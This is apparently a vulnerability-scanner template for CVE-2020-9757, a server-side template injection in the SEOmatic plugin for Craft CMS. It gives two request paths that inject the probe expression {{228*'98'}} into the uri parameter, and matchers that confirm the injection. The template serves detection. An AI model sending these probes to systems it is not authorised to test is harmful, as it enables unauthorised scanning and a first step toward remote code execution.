id: cve-2020-9757 info: name: SEOmatic < 3.3.0 Server-Side Template Injection author: dwisiswant0 severity: high description: The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller. requests: - method: GET path: - "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}" - "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "MetaLinkContainer" - "canonical" - "22344" condition: and part: body